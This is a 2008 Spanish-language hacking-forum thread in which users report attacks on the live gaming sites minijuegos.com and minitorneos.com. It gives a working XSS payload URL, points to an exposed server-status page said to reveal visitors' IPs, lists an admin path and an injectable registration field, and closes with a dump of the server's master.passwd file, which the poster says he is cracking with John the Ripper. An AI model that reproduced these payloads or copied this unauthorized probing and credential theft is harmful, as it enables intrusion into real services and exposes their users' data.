[°] Todas las IPs de los usuarios online de Minijuegos

c1c4tr1z · 11 Julio 2008, 00:06 AM

Perdon si esta mal "posteado", pero aca hay una vulnerabilidad sobre XSS o HTMLi en minijuegos.com:

http://www.minijuegos.com/busqueda.php?nov=0&termino=%22%3E%3Cmarquee%3E%3Ch1%3EXSS%3C/h1%3E%3C/marquee%3E

UPDATE: Y despues dejaron intensionalmente (creo

) server-status habilitado:

Código [Seleccionar]

http://www.minijuegos.com/server-status

Lo que nos permitiria ver en tiempo real a los usuarios conectados, path del servidor, la accion que toma el usuario remoto, etc.

Y en minitoneos.com, por el input de usuario [metodo POST]:

Código [Seleccionar]

http://www.minitorneos.com/registro/

Saludos!

dimitrix · 16 Julio 2008, 22:14 PM

Es como un RFI (Remote File Include) pero con archivos locales de su cuenta.

Rozor · 18 Julio 2008, 02:21 AM

pues eso LFI ( Local File Include/Inclusion ).
o RFI ( Remote File Include/Inclusion ).

¿Tan dificil es? xDDDDDDD

¿no es realmente humillante para ti lo que escribes?

chrominum · 30 Julio 2008, 00:22 AM

http://www.minijuegos.com/admin

berz3k · 13 Agosto 2008, 22:41 PM

Muy curioso, un FreeBSD, kernel vulnerable y el john aun no entrega pass de root XDDD

PASSWORDS

Código [Seleccionar]


# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
ftp:*:21:14:FTP owner:/nonexistent:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
admin:*:1001:0:Admin User:/home/admin:/bin/tcsh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
vscan:*:110:110:Scanning Virus Account:/var/amavis:/bin/sh
pdns_recursor:*:120:120:pdns_recursor pseudo-user:/nonexistent:/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
dovecot:*:143:143:Dovecot User:/var/empty:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
user3:*:1002:1002:User &:/home/user3:/bin/tcsh

-berz3k.

Test Foro de elhacker.net SMF 2.1

[°] Todas las IPs de los usuarios online de Minijuegos

c1c4tr1z

dimitrix

Rozor

chrominum

berz3k